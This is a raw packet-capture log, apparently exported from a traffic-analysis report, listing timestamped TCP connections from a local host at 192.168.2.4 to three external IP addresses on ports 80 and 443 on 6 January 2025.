                                                                                                                                                                        Jan 6, 2025 07:53:19.720079899 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720129967 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.720278025 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720330954 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.720395088 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720448017 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.720520020 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720577955 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.720731974 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720781088 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.720841885 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.720892906 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721088886 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721132994 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721143007 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721155882 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721172094 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721189022 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721436977 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721493959 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721494913 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721510887 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721534967 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721548080 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721564054 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721606016 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721756935 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.721798897 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.721956968 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.722004890 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.722048044 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.722096920 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.722307920 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.722353935 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.807303905 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.807368040 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.807502031 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.807558060 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.807708025 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.807763100 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.807879925 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.807926893 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.808100939 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.808149099 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.808305979 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.808361053 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.808434963 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.808485031 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.808650970 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.808706045 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.808819056 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.808868885 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809134007 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809171915 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809182882 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809195995 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809211969 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809231043 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809452057 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809510946 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809612036 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809660912 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809801102 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.809850931 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.809967041 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.810014009 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.810169935 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.810209990 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.810214996 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.810223103 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.810254097 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.945708990 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.945780039 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.945784092 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.945815086 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.945831060 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.945846081 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.945997953 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.946058035 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.946237087 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.946290016 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.946434975 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.946491957 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.946556091 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.946608067 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.946752071 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.946803093 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.946964025 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.947016001 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947083950 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.947135925 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947145939 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.947161913 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.947191954 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947215080 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947305918 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947330952 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:19.947346926 CET49744443192.168.2.4166.62.27.188
                                                                                                                                                                        Jan 6, 2025 07:53:19.947351933 CET44349744166.62.27.188192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:25.353287935 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:25.358139992 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:25.358206034 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:25.358736038 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:25.363502979 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:25.951505899 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:25.956243038 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:25.961069107 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.110516071 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.185700893 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:26.457964897 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:26.458009958 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.458065987 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:26.476212025 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:26.476248980 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.940195084 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.940282106 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:26.944533110 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:26.944547892 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.944791079 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:26.994132042 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.035341978 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.101429939 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.101490021 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.101680040 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.111282110 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.121128082 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.125988960 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.275130033 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.310204983 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.310250998 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.310439110 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.313972950 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.313990116 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.495455027 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.495501995 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.797152042 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.799586058 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.799623966 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.933135986 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.933191061 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.933413982 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.933664083 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:27.936824083 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.937998056 CET4975680192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.941759109 CET8049753158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.941821098 CET4975380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.942850113 CET8049756158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:27.942929029 CET4975680192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.942979097 CET4975680192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:27.947720051 CET8049756158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:28.540904045 CET8049756158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:28.542428017 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:28.542475939 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:28.542557955 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:28.542891979 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:28.542903900 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:28.592082977 CET4975680192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:28.997570038 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:28.999738932 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:28.999778032 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:29.148910999 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:29.148976088 CET44349757188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:29.149054050 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:29.149543047 CET49757443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:29.154124022 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:29.158905983 CET8049758158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:29.158992052 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:29.159089088 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:29.163862944 CET8049758158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.338243961 CET8049758158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.339736938 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.339797974 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.339869976 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.340142965 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.340162992 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.388875008 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.809786081 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.812484026 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.812515020 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.961150885 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.961216927 CET44349759188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.961319923 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.961776018 CET49759443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:30.965661049 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.966265917 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.970626116 CET8049758158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.970691919 CET4975880192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.971015930 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:30.971210003 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.971338034 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:30.976099014 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.220906019 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.277071953 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.285763025 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.285814047 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.285881042 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.295126915 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.295156956 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.777097940 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.778824091 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.778842926 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.919859886 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.919929981 CET44349762188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.919975042 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.920402050 CET49762443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:32.959481001 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.960777044 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.964660883 CET8049761158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.964739084 CET4976180192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.965558052 CET8049763158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:32.965617895 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.965786934 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:32.970597029 CET8049763158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:33.863693953 CET8049763158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:33.867866039 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:33.867904902 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:33.870493889 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:33.870831013 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:33.870846033 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:33.916434050 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.370340109 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.373195887 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:34.373224974 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.525013924 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.525110006 CET44349764188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.528440952 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:34.528774977 CET49764443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:34.586345911 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.591535091 CET8049763158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.592422009 CET4976380192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.596688032 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.601495981 CET8049765158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:34.603149891 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.609577894 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:34.614346027 CET8049765158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.080518007 CET4976780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.085375071 CET8049767158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.085438967 CET4976780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.085757971 CET4976780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.090497971 CET8049767158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.187396049 CET8049765158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.188524008 CET4975680192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.189667940 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.189702988 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.189762115 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.190016031 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.190028906 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.236196041 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.644119024 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.646001101 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.646055937 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.797120094 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.797175884 CET44349768188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.797306061 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.797790051 CET49768443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:36.820949078 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.822016001 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.826905012 CET8049769158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.826967001 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.827065945 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.827289104 CET8049765158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:36.827347040 CET4976580192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:36.831835985 CET8049769158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.275969982 CET8049767158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.280905008 CET4976780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:37.285717010 CET8049767158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.396461964 CET8049769158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.397788048 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:37.397821903 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.397924900 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:37.398258924 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:37.398267031 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.440182924 CET8049767158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.607492924 CET8049769158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.607554913 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:37.614845037 CET4976780192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:37.874270916 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:37.896486998 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:37.896509886 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.030937910 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.031043053 CET44349771188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.031181097 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:38.052225113 CET49771443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:38.100728035 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:38.101929903 CET4977280192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:38.105881929 CET8049769158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.105936050 CET4976980192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:38.106766939 CET8049772158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.106848001 CET4977280192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:38.107059956 CET4977280192.168.2.4158.101.44.242
                                                                                                                                                                        Jan 6, 2025 07:53:38.111932039 CET8049772158.101.44.242192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.219199896 CET49773443192.168.2.4188.114.96.3
                                                                                                                                                                        Jan 6, 2025 07:53:38.219259024 CET44349773188.114.96.3192.168.2.4
                                                                                                                                                                        Jan 6, 2025 07:53:38.219325066 CET49773443192.168.2.4188.114.96.3
